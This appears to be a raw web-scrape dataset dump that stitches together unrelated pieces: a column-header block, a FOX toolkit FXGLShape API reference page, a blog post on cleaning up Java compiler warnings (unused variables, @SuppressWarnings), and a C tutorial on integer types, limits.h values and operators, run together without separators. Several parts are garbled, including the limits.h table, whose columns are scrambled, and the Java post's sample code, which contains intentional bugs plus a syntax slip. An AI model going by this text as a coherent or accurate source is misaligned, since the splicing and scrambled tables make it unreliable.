text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
#include <FXGLShape.h> #include <FXGLShape.h> Inheritance diagram for FX::FXGLShape: See also: Construct with specified origin and options. Construct with specified origin, options and front and back materials. Copy constructor. [virtual] Called by the viewer to get bounds for this object. Reimplemented from FX::FXGLObject. Draw this object in a viewer. Draw this object for hit-testing purposes. Copy this object. Reimplemented from FX::FXGLObject. Reimplemented in FX::FXGLCone, FX::FXGLCube, FX::FXGLCylinder, FX::FXGLSphere, and FX::FXGLTriangleMesh. Return true if this object can be dragged around. Return true if this object can be deleted from the scene. Drag this object from one position to another. [inline] Set the tool tip message for this object. Get the tool tip message for this object. Set the material for specified side (where side = 0 or 1). Get the material for specified side (where side = 0 or 1). Save shape to a stream. Reimplemented from FX::FXObject. Load shape from a stream.
http://www.fox-toolkit.org/ref14/classFX_1_1FXGLShape.html
CC-MAIN-2017-43
refinedweb
160
72.42
Keep Your Code Clean My mother used to tell me that she wasn’t my maid. My USAF drill instructor used to tell us that she wasn’t our mother. An early mentor used to metaphorically beat me for having clumsy and cluttered code. The common impetus was that things can and sometimes should be neat and tidy. Being sloppy can lead to code that disagrees with your IDE, or worse, with your keen sense of appropriate practices. I recently worked on a project with (I am not exaggerating) 50,000 compiler warnings in their Java source files. I’ll let that sink in. This was a very large project with thousands of classes, many with hundreds or thousands of lines, more than a few having dozens or hundreds of members, and some having classes that extended classes several levels deep. It was probably unnecessarily large and complex, but that wasn’t what I was hired to fix, nor was it a judgement I was prepared to make. The key to the difficulty was that with so many warnings, it became impossible to find the ones that caused actual problems in the software. It had to be cleaned; someone just had to do it, and that was me. A lot of warnings were due to untyped collections because of a code base started in or before Java 1.4. Similarly, a lot of Serializable classes didn’t have a SerialVersionUID value. A full third of the warnings were simply unused imports, and there were more than a fair share of unused local variables. A very large number of the warnings, though, were unused member variables. I’ll talk about the unused variables, both local and member. Members First Since I’m a little bit of an elitist, members first. Here’s an example class. <pre>public class Foo { private String string = ""; public void foo() { // Ignore string } }</pre> By this example I mean that all of the members were private, and there were no accessors, and except for perhaps setting the value, the members in question weren’t ever read. In its attempts to help avoid errors, Eclipse (and Ant and Maven if you allow them and scour the output) points these out to draw your attention to them. At a glance, a simple scan for the variable in the class would point out its true nature of unused. In the trivial example there, there’s a value that gets assigned, but is never accessed in the class. Also, at first glance it appears that there’s no need for the value; since it’s private, it seems that nothing can get to it. Our friendly frameworks, though, foil us in our attempts to keep our code brief. Thanks to heavy use of reflection, naming our Foo class as the bean behind a form in an MVC framework can use this value. It can happen, then, that removing this value can cause a problem in an RIA application that uses a reflection-heavy server-side framework. Three simple solutions exist. First, and in line with what most of us do for encapsulation, is to create accessors. The second, and more simple solution, is to not declare the member as private, which flops in the face of encapsulation. Really, since the framework is using reflection, encapsulation is already broken. Finally, adding a simple @SuppressWarning(“unused”) will hide the warning, but arguably not fix the problem. Simply removing the “private” from our member declaration will make it use the default package access, which then allows any class in the same package to access the member, so then its use becomes undetermined. The IDE warning at least, goes away. Adding accessors won’t do any less, as they’d need at least the same kind of non-private accessor to avoid a warning on the function. Further, if you add an accessor method to some of the members, reflection can get wonky and complain about others that don’t have such methods. Since the project in question had no code coverage tool used on it (much less unit tests in the first place), it is impossible to tell what members declared in this way will cause a problem without either thoroughly scouring (or intimately knowing) the JSPs for bean use to see what members might be used. Alternatively, the members could be removed and then the application could be run to see if errors occurred, but this application had hundreds of pages, a lot of which were generated by server-side actions, not always in JSPs, so there could be an unfortunately large number of permutations that could be hit before encountering the member in question. To maintain the facade of encapsulation, I added thousands of @SuppressWarnings annotations to the complaining members. This removes the warning without otherwise affecting the member, and it doesn’t add any potential complexity of some members have getters and some do not, leaving the reflection framework happy. Further, it gives something that could be searched for later to identify and correct the problem. A real solution to the problem is to add comprehensive unit and integration tests and validate with a code coverage tool, that will at the very least rule out some of the variables as never getting used. This is tough when using reflection-heavy frameworks, but it can be done with the right integration test library and good unit test practices. Locals, Also There were also, as mentioned, a large number of unused variables in methods. These came in a few flavors, as this example class shows: <pre>public class Foo { public void foo() { String string = "unused"; String result = UtilityClass.someHelper(); // Ignore both strings } public boolean validate(String string) { try { long l = new Long(string).longValue(); return true; } catch (Exception e) { // Must not be a number... } return false; } }</pre> In our foo() method, we can see that there’s an easy String and a hard String that aren’t used. The first, named string, is just an assignment to a literal. It isn’t used. Reflection can’t get to it. It can be just eliminated. Even if this weren’t a literal, but an assignment to another variable, or even the result of a simple call it could be eliminated without concern. The second, named result, is a little tougher. It requires a little knowledge of the called method to know whether the entire line can be eliminated or just the assignment. It may be the case that this just accessing a simple “return member value,” or even a more complex “return value from a member collection” or some similar activity. As I started cleaning these up I found that sometimes these were the results of very complex actions, such as EJB methods that created or updated database values, or made other web service calls. The easy fix for these is to comment the name and assignment and leave the call, such as /* String result = */ UtilityClass.someHelper(). Sure, this might make a useless spin as a member value of the caller is accessed and discarded, but without investigating every call, it was necessary to make sure that functionality didn’t get accidentally removed. The latter, our validate() method, uselessly assigns an unused variable in an attempt to ensure that it conforms (in this case catching a simple NumberFormatException. These are solved by again commenting the variable and assignment. Some of these were made more complex because the variable would be reused, assigning different values as the method progressed, but never reading from the value. This took a little more time to remove all of the assignments, but in the end, the methods were clean of unused cruft. Resulting Value To be fair, since the project was very large, it is undoubtedly the case that some of the unused variables (and even imports) are the result of refactoring over the years (it’s been a while since 1.4 was the JDK to use…let’s leave it at that). There’s little excuse, though, for not cleaning up after yourself when making these changes, so that later maintainers will not have such mind-boggling numbers of unnecessary warnings to go through. A simple rule to follow is that there should be no compiler warnings in your code! Java gives us the handy @SuppressWarnings annotation that can be used for those cases when the clean-up is not so easy. That and just watching the IDE or build script output for warnings will help everyone in their development efforts. There was certainly value in removing these warnings. Cleaning the warnings for unused imports and variables, and adding SerialVersionUIDs (but sadly suppressing the collection type warnings for the moment) revealed a few dozen logic errors, a bunch of dead code, some errors in exception handling, and other warnings that could have helped identify problems if they weren’t lost in the wave of warnings. I’ll leave a sample class for you to play with that contains examples of these potential bug-causing bits. <pre>public class Foo { public boolean badException(){ try { UtilityClass.mayCauseException(); return true; } catch (Exception e) { // Whew...program continues } finally { // Since this always executes, it always returns false... return false; } } public void badLogic(String string){ if( string != null || string.trim().length() == 0 ) { // Can only get here if string is not null, or if null.trim()...whoops... } } final static Long expected = 1; final static Long actual = 2; public void deadCode() { if(expected ! = actual) { //Will always get here } else { // Can never get here! } } }</pre> One thought on “Keep Your Code Clean”
https://objectpartners.com/2010/10/14/keep-your-code-clean/
CC-MAIN-2020-40
refinedweb
1,596
60.14
Recently there was a need to connect to a SSH server from my C# code. I needed to perform a simple task: login to a remote Linux device, execute a command and read the response. I knew there were a number of free Java SSH libraries out there and I hoped to find a free .NET one that will allow me to do just that, but all I could find were commercial components. After experimenting with an open source Java SSH library called JSch I decided to try and port it to C# just for the sake of exercise. The result is the attached sharpSsh library and this article which explains how to use it. SSH (Secure Shell) is a protocol to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over unsecured channels. The JSch library is a pure Java implementation of the SSH2 protocol suite; It contains many features such as port forwarding, X11 forwarding, secure file transfer and supports numerous cipher and MAC algorithms. JSch is licensed under BSD style license. My C# version is not a full port of JSch. I ported only the minimal required features in order to complete my simple task. The following list summarizes the supported features of the library: Please check my homepage for the latest version and feature list of SharpSSH. Let me begin with a small disclaimer. The code isn't fully tested, and I cannot guarantee any level of performance, security or quality. The purpose of this library and article is to educate myself (and maybe you) about the SSH protocol and the differences between C# and Java. In order to provide the simplest API for SSH communication, I created two wrapper classes under the Tamir.SharpSsh namespace that encapsulates JSch's internal structures: SshStream- A stream based class for reading and writing over the SSH channel. Scp- A class for handling file transfers over the SSH channel. The SshStream class makes reading and writing of data over an SSH channel as easy as any I/O read/write task. Its constructor gets three parameters: The remote hostname or IP address, a username and a password. It connects to the remote server as soon as it is constructed. //Create a new SSH stream SshStream ssh = new SshStream("remoteHost", "username", "password"); //..The SshStream has successfully established the connection. Now, we can set some properties: //Set the end of response matcher character ssh.Prompt = "#"; //Remove terminal emulation characters ssh.RemoveTerminalEmulationCharacters = true; The Prompt property is a string that matches the end of a response. Setting this property is useful when using the ReadResponse() method which keeps reading and buffering data from the SSH channel until the Prompt string is matched in the response, only then will it return the result string. For example, a Linux shell prompt usually ends with '#' or '$', so after executing a command it will be useful to match these characters to detect the end of the command response (this property actually gets any regular expression pattern and matches it with the response, so it's possible to match more complex patterns such as "\[[^@]*@[^]]*]#\s" which matches the bash shell prompt [user@host dir]# of a Linux host). The default value of the Prompt property is "\n", which simply tells the ReadResponse() method to return one line of response. The response string will typically contain escape sequence characters which are terminal emulation signals that instruct the connected SSH client how to display the response. However, if we are only interested in the 'clean' response content we can omit these characters by setting the RemoveTerminalEmulationCharacters property to true. Now, reading and writing to/from the SSH stream will be done as follows: //Writing to the SSH channel ssh.Write( command ); //Reading from the SSH channel string response = ssh.ReadResponse(); Of course, it's still possible to use the SshStream's standard Read/ Write I/O methods available in the System.IO.Stream API. Transferring files to and from an SSH server is pretty straightforward with the Scp class. The following snippet demonstrates how it's done: //Create a new SCP instance Scp scp = new Scp(); //Copy a file from local machine to remote SSH server scp.To("C:\fileName", "remoteHost", "/pub/fileName", "username", "password"); //Copy a file from remote SSH server to local machine scp.From("remoteHost", "/pub/fileName", "username", "password", "C:\fileName"); The Scp class also has some events for tracking the progress of file transfer: Scp.OnConnecting- Triggered on SSH connection initialization. Scp.OnStart- Triggered on file transfer start. Scp.OnEnd- Triggered on file transfer end. Scp.OnProgress- Triggered on file transfer progress update (The ProgressUpdateIntervalproperty can be set to modify the progress update interval time in milliseconds). The demo project is a simple console application demonstrating the use of SshStream and Scp classes. It asks the user for the hostname, username and password for a remote SSH server and shows examples of a simple SSH session, and file transfers to/from a remote SSH machine. Here is a screen shot of an SSH connection to a Linux shell: And here is a file transfer from a Linux machine to my PC using SCP: In the demo project zip file you will also find an examples directory containing some classes showing the use of the original JSch API. These examples were translated directly from the Java examples posted with the original JSch library and show the use of advanced options such as public key authentication, known hosts files, key generation, SFTP and others. Scpclass. General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/IP/sharpssh.aspx
crawl-002
refinedweb
946
52.19
Creating a program that searches if a word is repeated and how many times it is in a list, count the number of times a word appears in a text file python python program to count the occurrences of a word in a text file count the number of occurrences of each word in python count the number of times each word appears in a text file python generating a count of word occurrences python count occurrences of all items in list count occurrences of each element in list python So far I have created this: a = str(input("Word 1 = ")) b = str(input("Word 2 = ")) c = str(input("Word 3 = ")) d = str(input("Word 4 = ")) e = str(input("Word 5 = ")) f = str(input("Word 6 = ")) words = [a, b, c, d, e, f] def count_words(words): for i in words: wordscount = {i:words.count(i)} print(wordscount) count_words(words) And this is what comes out: {'word': 6} {'word': 6} {'word': 6} {'word': 6} {'word': 6} {'word': 6} And my question is how can I make it so it doesn't print the key in the list if it already has so for example not the above but this: {'word': 6} You should slice the array and check if the word you're going to print hasn't already been checked. def count_words(words): for index, i in enumerate(words): wordscount = {i:words.count(i)} if i not in words[0:index]: print(wordscount) See also that I used enumerate() to keep track of the index inside your loop. Python, Many times it is required to count the occurrence of each word in a text file Note : Make sure the text file is in same directory as the Python file. for key in list (d. keys()): Python program to Count the Number of occurrences of a key-value Find the first repeated word in a string in Python using Dictionary� I need to write a program that asks the user for some text and then checks how many times the word "owl" is repeated in there. The program should also count the word if it's included in another one. Ex "hellowl" should return; The word "owl" was repeated 1 time. First of all, welcome to Stack Overflow! A solution to your problem would involve initialising another list, probably called words_mentioned above your loop, and adding to it the words that you've already printed. If the word is in words_mentioned, don't print it. Final code would look like this: a = str(input("Word 1 = ")) b = str(input("Word 2 = ")) c = str(input("Word 3 = ")) d = str(input("Word 4 = ")) e = str(input("Word 5 = ")) f = str(input("Word 6 = ")) words = [a, b, c, d, e, f] words_mentioned = [] def count_words(words): for i in words: wordscount = {i:words.count(i)} if i not in words_mentioned: print(wordscount) words_mentioned.append(i) count_words(words) Python, Python | Count occurrences of each word in given text file (Using dictionary) � Python program to Count the Number of occurrences of a key-value� The Problem As an author I want to know the number of times each word appears in a sentence So that I can make sure I'm not repeating myself. Acceptance Criteria Given a sentence When the program is run Then I'm returned a distinct list of words in the sentence and the number of times they have occurred In order to not count words more than once, you could use a set in your for i in words: loop: replace it with for i in set(words): You could also use the Counter() class from iterTools: from itertools import Counter print( Counter(words) ) 14. List Algorithms — How to Think Like a Computer Scientist , Test-driven development (TDD) is a software development practice which takes Notice we were a bit lazy, and used split to create our list of words — it is repeatedly leads us to a very much better algorithm for searching in a list of Do you think it is a coincidence that there are no repeated numbers in the solution? Test how many times a word repeats in list If I understand your requirement correctly you want something along these lines. Create two new lists - ‘unique’ and ‘counts’ - making sure they're cleared before you start. 7. Strings — How to Think Like a Computer Scientist: Learning with , If you want the zero-eth letter of a string, you just put 0, or any expression with Each time through the loop, the next character in the string is assigned to the variable char. Abecedarian refers to a series or list in which the elements appear in A more difficult problem is making the program realize that zebras are not fruit. Word searches the current page, from top to bottom, for the specified style. If the style isn't found, Word searches next from the top of the page to the beginning of the document, and then from the bottom of the page to the end of the document. Generating a Count of Word Occurrences (Microsoft Word), If you are searching for individual words, make sure you click the list is in descending order based on how many times the word If you don't like to use macros for some reason, there are other programs you can use to create word counts. What if I dont know the word and want to find repeating words! Sorting the list is as easy as calling the sort() function. After the example calls the sort() function, it prints the list again so that you can see the result. Choose Run→Run Module. You see a Python Shell window open. The application outputs both the unsorted and sorted lists. You may need to sort items in reverse order at times. Python Data Type: List - Exercises, Practice, Solution, Practice with solution of exercises on Python Data Types: examples Write a Python program to find the list of words that are longer than n from a given list of words. ancient algorithm for finding all prime numbers up to any given limit. Write a Python program to create a list by concatenating a given list� count() is an inbuilt function in Python that returns count of how many times a given object occurs in list. Syntax : list_name.count(object) Parameters : Object is the things whose count is to be returned. - Thanks a lot I am a beginner and still learning and I really appreciate the answer - I'd really appreciate it if you could mark my answer as correct by clicking the grey tick mark next to my answer. It really does help!
http://thetopsites.net/article/55029702.shtml
CC-MAIN-2021-04
refinedweb
1,107
59.87
A digital output is a simple high (on) or low (off) signal from a board's pin that you can control with MicroPython. Using a digital output you can turn something on or off, like a LED, a relay, a transistor, or more. Let's walk through how to turn a LED on and off with a digital output from a MicroPython board. There's an entire guide just on blinking a LED with MicroPython that you'll want to read and follow first. In that guide you'll see how to wire a LED to a MicroPython board, for example like with the Feather Huzzah ESP8266, a red LED, and a 560 ohm resistor as below: - Digital GPIO 15 is connected to the anode, or longer leg, of the LED. It's very important to use the correct leg of the LED otherwise it won't light up as expected! - The cathode, or shorter leg, of the LED is connected to one side of the resistor (unlike the LED it doesn't matter which way you orient the resistor). - The other side of the resistor is connected to the board's ground or GND pin. Once the LED is wired to the board connect to the serial or other MicroPython REPL and create a digital output pin by running the following code: import machine pin = machine.Pin(15, machine.Pin.OUT) import machine pin = machine.Pin(15, machine.Pin.OUT) The import machine line will import the machine module which provides much of the hardware access API for MicroPython. In particular the machine module has a Pin class that allows you to create pin objects for all of the digital I/O pins on a board. In this case the second line will create an object called pin and set it as an instance of the machine module Pin class. The initializer for the Pin class takes two important parameters: - The number or name of the board pin. Check your board's documentation for details on the pin values--some boards like the pyboard use a string identifier (like 'X1') while other boards like the ESP8266 use simple numbers (like 15, 14, etc.). - The type of digital I/O pin, in this case a digital output. The machine.Pin.OUT value is a special constant value that tells MicroPython we intend to use this pin as an output we can control. Now control the output level of the pin by calling the value function on the pin object in different ways: pin.value(0) pin.value(1) pin.value(True) pin.value(False) pin.value(0) pin.value(1) pin.value(True) pin.value(False) The value function takes a single parameter which indicates if the output should be high or low (on or off). Notice when the pin value is set to 0 or False the LED turns off, and when set to 1 or True the LED turns on! The LED turns on and off because the digital output connected to it changes from high to low voltage levels. There's also a handy shortcut for setting a pin to a high or low level directly with the high and low functions: pin.high() pin.low() pin.high() pin.low() The high function will set the pin to a high level, and the low function will set the pin to a low level. Notice again the LED turns on and off as the level from the pin changes. That's all there is to using digital outputs with MicroPython! Although they're simple digital outputs are very handy for talking to devices that expect an on or off signal like a LED, a relay or power tail, or a transistor controlling high power devices like a solenoid, laser, super bright LED and more.
https://learn.adafruit.com/micropython-hardware-digital-i-slash-o/digital-outputs
CC-MAIN-2022-27
refinedweb
636
65.35
Recurrent Neural Networks (RNNs) are very powerful sequence models for classification problems. However, in this tutorial, we will use RNNs as generative models, which means they can learn the sequences of a problem and then generate entirely a new sequence for the problem domain. After reading this tutorial, you will learn how to build a LSTM model that can generate text (character by character) using Keras in Python. In text generation, we show the model many training examples so it can learn a pattern between the input and output. Each input is a sequence of characters and the output is the next single character. For instance, say we want to train on the sentence "python is great", the input is "python is grea" and output would be "t". We need to show the model as many examples as our memory can handle in order to make reasonable predictions. Related: How to Predict Stock Prices in Python using TensorFlow 2 and Keras. Let's install the required dependencies for this tutorial: pip3 install tensorflow==1.13.1 keras numpy requests Importing everything: import numpy as np import os import pickle from keras.models import Sequential from keras.layers import Dense, LSTM from keras.callbacks import ModelCheckpoint from string import punctuation We are going to use a free downloadable book as the dataset: Alice’s Adventures in Wonderland by Lewis Carroll. These lines of code will download it and save it in a text file: import requests content = requests.get("").text open("data/wonderland.txt", "w", encoding="utf-8").write(content) Just make sure you have a folder called "data" exists in your current directory. Now let's try to clean this dataset: # read the textbook text = open("data/wonderland.txt", encoding="utf-8").read() # remove caps and replace two new lines with one new line text = text.lower().replace("\n\n", "\n") # remove all punctuations text = text.translate(str.maketrans("", "", punctuation)) The above code reduces our vocabulary for better and faster training by removing upper case characters and punctuations as well as replacing two consecutive new line by just one. Let's print some statistics about the dataset: n_chars = len(text) unique_chars = ''.join(sorted(set(text))) print("unique_chars:", unique_chars) n_unique_chars = len(unique_chars) print("Number of characters:", n_chars) print("Number of unique characters:", n_unique_chars) Output: unique_chars: 0123456789abcdefghijklmnopqrstuvwxyz Number of characters: 154207 Number of unique characters: 39 Now that we loaded and cleaned the dataset successfully, we need a way to convert these characters into integers, there are a lot of Keras and Scikit-Learn utilities out there for that, but we are going to make this manually in Python. Since we have unique_chars as our vocabulary that contains all the unique characters of our dataset, we can make two dictionaries that maps each character to an integer number and vice-versa: # dictionary that converts characters to integers char2int = {c: i for i, c in enumerate(unique_chars)} # dictionary that converts integers to characters int2char = {i: c for i, c in enumerate(unique_chars)} Let's save them to a file (to retrieve them later in text generation): # save these dictionaries for later generation pickle.dump(char2int, open("char2int.pickle", "wb")) pickle.dump(int2char, open("int2char.pickle", "wb")) Now, we need to split the text up into subsequences with a fixed size of 100 characters, as discussed earlier, the input is 100 sequence of characters (converted to integers obviously) and the output is the next character (onehot-encoded). Let's do it: # hyper parameters sequence_length = 100 step = 1 batch_size = 128 epochs = 40 sentences = [] y_train = [] for i in range(0, len(text) - sequence_length, step): sentences.append(text[i: i + sequence_length]) y_train.append(text[i+sequence_length]) print("Number of sentences:", len(sentences)) Output: Number of sentences: 154107 I've chosed 40 epochs for this problem, this will take few hours to train, you can add more epochs to gain better performance. The above code creates two new lists which contains all the sentences (fixed length sequence of 100 characters) and its corresponding output (the next character). Now we need to transform the list of input sequences into the form (number_of_sentences, sequence_length, n_unique_chars). n_unique_chars is the total vocabulary size, in this case; 39 total unique characters. # vectorization X = np.zeros((len(sentences), sequence_length, n_unique_chars)) y = np.zeros((len(sentences), n_unique_chars)) for i, sentence in enumerate(sentences): for t, char in enumerate(sentence): X[i, t, char2int[char]] = 1 y[i, char2int[y_train[i]]] = 1 print("X.shape:", X.shape) print("y.shape:", y.shape) Output: X.shape: (154107, 100, 39) y.shape: (154107, 39) As expected, each character (input sequences or output character) is represented as a vector of 39 numbers, full of zeros except with a 1 in the column for the character index. For example, "a" (index value of 12) is one-hot encoded like that: [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.] Now let's build the model, it has basically one LSTM layer (more layers is better) with an arbitrary number of 128 LSTM units. The output layer is a fully connected layer with 39 units where each neuron corresponds to a character (probability of the occurence of each character). # building the model model = Sequential([ LSTM(128, input_shape=(sequence_length, n_unique_chars)), Dense(n_unique_chars, activation="softmax"), ]) Let's train the model now: model.summary() model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"]) # make results folder if does not exist yet if not os.path.isdir("results"): os.mkdir("results") # save the model in each epoch checkpoint = ModelCheckpoint("results/wonderland-v1-{loss:.2f}.h5", verbose=1) model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint]) This will start training, which gonna look something like this: Epoch 00026: saving model to results/wonderland-v1-1.10.h5 Epoch 27/40 154107/154107 [==============================] - 314s 2ms/step - loss: 1.0901 - acc: 0.6632 Epoch 00027: saving model to results/wonderland-v1-1.09.h5 Epoch 28/40 80384/154107 [==============>...............] - ETA: 2:24 - loss: 1.0770 - acc: 0.6694 This will take few hours, depending on your hardware, try increasing batch_size to 256 for faster training. After each epoch, the checkpoint will save model weights in results folder. Now we have trained the model, how can we generate new text? Open up a new file, I will call it generate.py and import: import numpy as np import pickle import tqdm from keras.models import Sequential from keras.layers import Dense, LSTM from keras.callbacks import ModelCheckpoint We need a sample text to start generating with, you can take sentences from the training data which will perform better, but I'll try to produce a new chapter: seed = "chapter xiii" Let's load the dictionaries that maps each integer to a character and vise-verca that we saved before in the training process: char2int = pickle.load(open("char2int.pickle", "rb")) int2char = pickle.load(open("int2char.pickle", "rb")) Building the model again: sequence_length = 100 n_unique_chars = len(char2int) # building the model model = Sequential([ LSTM(128, input_shape=(sequence_length, n_unique_chars)), Dense(n_unique_chars, activation="softmax"), ]) Now we need to load the optimal set of model weights, choose the least loss you have in the results folder: model.load_weights("results/wonderland-v1-1.10.h5") Let's start generating: # generate 400 characters generated = "" for i in tqdm.tqdm(range(400), "Generating text"): # make the input sequence X = np.zeros((1, sequence_length, n_unique_chars)) for t, char in enumerate(seed): X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1 # predict the next character predicted = model.predict(X, verbose=0)[0] # converting the vector to an integer next_index = np.argmax(predicted) # converting the integer to a character next_char = int2char[next_index] # add the character to results generated += next_char # shift seed and the predicted character seed = seed[1:] + next_char print("Generated text:") print(generated) All we are doing here, is starting with a seed text, constructing the input sequence, and then predicting the next character. After that, we shift the input sequence by removing the first character and adding the last character predicted. This gives us a slighty changed sequence of inputs that still has length equal to the size of our sequence length. We then feed in this updated input sequence into the model to predict another character, repeating this process N times will generate a text with N characters. Here is an interesting text generated: Generated Text: ded of and alice as it go on and the court well you wont you wouldncopy thing there was not a long to growing anxiously any only a low every cant go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo That is clearly english! But you know, most of the sentences doesn't make sense, that is because it is a character-level model. Note though, this is not limited to english text, you can use whatever type of text you want. In fact, you can even generate Python code once you have enough lines of code. Great, we are done. Now you know how to make RNNs in Keras as generative models, training LSTM network on text sequences, cleaning text and tuning the performance of the model. In order to further improve the model, you can: I suggest you grab your own text, just make sure it is long enough (more than 100K characters) and train on it! Check the full code here (modified a little bit). Happy Training ♥View Full Code
https://www.thepythoncode.com/article/text-generation-keras-python
CC-MAIN-2020-16
refinedweb
1,629
52.7
I am brand new to java programming and am having a heck of a time trying to figure this out. I need to create a weekly temperature program that asks the user to input the day, the high temperature, and the low temperature for that day. The total high and total low will be calculated as I enter the high and low temperatures. After all seven days have been entered, an average high and average low will be calculated for the week. I need to use a for loop, while loop, or a do-while loop to enter the temps. I need to display the output as: The average high temp of the week: (high average). The average low temp of the week: (low average). I have been working at this program trying to figure out what I need to do for hours. I am totally lost. Any help would be appreciated. This is what I have so far: import java.util.Scanner; public class assignment3a_Temp { public static void main(String[]args) { Scanner keyboard = new Scanner(System.in); int low = 0, high = 0, count, avghigh = high/7, avglow = low/7; String day; //************************************************* for(count = 1; count <= 7; count++) { System.out.print("Enter day " + count + " of the week."); day = keyboard.nextLine(); System.out.println("Enter day " + count + " low temperature."); low = keyboard.nextInt(); System.out.println("Enter day " + count + " high temperature."); high = keyboard.nextInt(); } System.out.println("The average low for the week is " + avglow); System.out.println("The average igh for the week is " + avghigh); { } } }
http://www.javaprogrammingforums.com/loops-control-statements/30176-temperature.html
CC-MAIN-2018-09
refinedweb
254
67.15
$ cnpm install strictmodel Strict models are meant to be (nearly) a drop-in replacement for Backbone models but are far more restrictive and structured. Backbone models have a lot of flexibility in that you don't have to define what you're wanting to store ahead of time. The only challenge with that is that for more complex applications is actually becomes quite tricky to remember what properties are available to you. Using strict models means they're much more self-documenting and helps catch bugs. Someone new to the project can read the models and have a pretty good idea of how the app is put together. It also uses's ES5's fancy Object.defineProperty to treat model attributes as if they were properties. This means you can set an attribute like this: user.name = 'henrik' and still get a change:name event fired. Obviously, this restriction also means that this won't work in browsers that don't support that. You can check specific browser support here: This project still needs more love, but I figured I'd open it up for now anyway. Open source, FTW!: false, default: 'Bob' } } } }); // backbone: user.set('firstName', 'billy bob'); // strict: user.firstName = 'billy bob'; // p.s. you can still do it the other way in strict (so you can still pass otions) user.set('firstName', 'billy bob', {silent: true}) // backbone: user.get('firstName'); // strict user.firstName; Strict inits a global registery for storing all initted models. It's designed to be used for looking up models based on their type, id and optional namespace. TODO: needs more docs on this instancof Modelwhich it will never be since it's not inheriting from Backbone's models. So, it require some minor tweaking of Backbone's collection code. Created by @HenrikJoreteg with contributions from @beausorensen MIT
https://developer.aliyun.com/mirror/npm/package/strictmodel
CC-MAIN-2020-50
refinedweb
304
67.65
Ok I have everything coded out, but my rounding still doesn't work. According to the book (and the professor follows the book to the letter so if I don't do it like this thats about 50% off my grade) I'm supposed to convert a float number to integer and back to float to round, but common sense, as well as what I see after compile, tells me that just completely destroys the decimals. Heres the code. Anyone got any clue how to do this? Code: // Program by Aaron Friedley // October 12, 2003 // Program rounds input then finds ceiling and floor #include <iostream.h> #include <math.h> #include <iomanip.h> int main (void) { // Prototypes float round (void); void ceilingfloor (float); // Declarations float num1; // Calls num1 = round ( ); ceilingfloor (num1); return 0; // Terminate main } // *** round function *** float round (void) { // Declarations float num1; int num2; float num3; cout << "Program by Aaron Friedley MWF 10:00\n\n" << "Input number: "; cin >> num1; // Declarations num2 = num1; num3 = num2; cout << setiosflags(ios::fixed) << setiosflags(ios::showpoint) << setprecision(2) << "Rounded: " << num3; return num3; // Terminate round } // *** ceilingfloor function *** void ceilingfloor (float num1) { cout << "\nCeiling: " << ceil (num1) << "\nFloor: " << floor (num1) << "\n"; return; // Terminate ceilingfloor }
http://cboard.cprogramming.com/cplusplus-programming/45862-rounding-numbers-printable-thread.html
CC-MAIN-2015-22
refinedweb
197
65.15
int. An unsigned int can hold all the values between 0 and UINT_MAX inclusive. UINT_MAX must be at least 65535. The int types must contain at least 16 bits to hold the required range of values.. An unsigned short can hold all the values between 0 and USHRT_MAX inclusive. USHRT_MAX must be at least 65535. The short types must contain at least 16 bits to hold the required range of values. On many (but not: 1. Short is truly smaller than int on the implementation. 2. All of the required values can fit into a short. NOTE: On some processor architectures code to manipulate shorts can be larger and slower than corresponding code which deals with ints. This is particularly true on the Intel x86 processors executing 32 bit code, as in programs for Windows (NT/95/98), Linux, and other UNIX derivatives. Every instruction which references a short in such code is one byte larger and usually takes extra processor time to execute.. An unsigned long can hold all the values between 0 and ULONG_MAX inclusive. ULONG_MAX must be at least 4294967295. The long types must contain at least 32 bits to hold the required range of values. The 1999 update to the ANSI/ISO C language standard has added a new integer type to C, one that is required to be at contain at least 64 bits.. There are two types of long long int, signed and unsigned. If neither is specified the long long is signed. The "int" in the declaration is optional. All 6 of the following declarations are correct:. Values In <limits.h> The standard header <limits.h> contains macros which expand to values which allow a program to determine information about the ranges of values each integer type can hold at run time. Each of these types (except for "plain" char, that is char without a signed or unsigned in front of it) must be able to contain a minimum range of values. SCHAR_MIN -127 signed char SCHAR_MAX 127 0 unsigned char UCHAR_MAX 255 CHAR_MIN "plain" char (note 1) CHAR_MAX SHRT_MIN -32767 signed short SHRT_MAX 32767 0 unsigned short USHRT_MAX 65535 INT_MIN -32767 signed int INT_MAX 32767 0 unsigned int UINT_MAX 65535 LONG_MIN -2147483647 signed long LONG_MAX 2147483647 0 unsigned long ULONG_MAX 4294967295 LLONG_MIN -9223372036854775807 signed long long LLONG_MAX 9223372036854775807 0 unsigned long long ULLONG_MAX 18446744073709551615 OPERATORS: C includes a large number of operators which fall into different categories. These are Arithmetic Operators Relational Operators Logical Operators Assignment Operators Unary Operators Conditional Operators Bit-Wise Operators Arithmetic Operators: / Division a / b is 5 c / d is 0.4 b / a is 3 d / c is 2.5 % Remainder a % b is 5 (Modulo b % a is 1 Not Possible Division) Each operator manipulates two operands, which may be constants, variables, or other arithmetic expression. The arithmetic operators may be used with int or double data type operands. On the other hand, the remainder operator also known as modulus operator can be used with integer operands to find the remainder of the division. For example Relational Operators: The double equal sign ‘= =’ used to compare equality is different from the single equal to ‘=’ sign which is used as an assignment operator. These six operators are used to form logical expressions, which represent conditions that are either true or false. The result of the expressions is of type integer, since true is represented by the integer value 1 and false is represented by the value 0. Among the relational and equality operators each operator is a complement of another operator in group. Logical Operators: In addition to arithmetic and relational operators, C has 3 logical operators for combining logical values and creating new logical values. These operators are Logical Operator Meaning ! NOT && Logical AND || Logical OR NOT: The NOT operator (!) is a unary operator (Operator that acts upon single operand). It changes a true value (1) to false (zero) and a false value to true. AND: The AND operator (&&) is a binary operator. Its result is true only when both operands are true; otherwise it is false. OR: The OR operator (| |) is a binary operator. Its result is false only when both the operands are false; otherwise true. 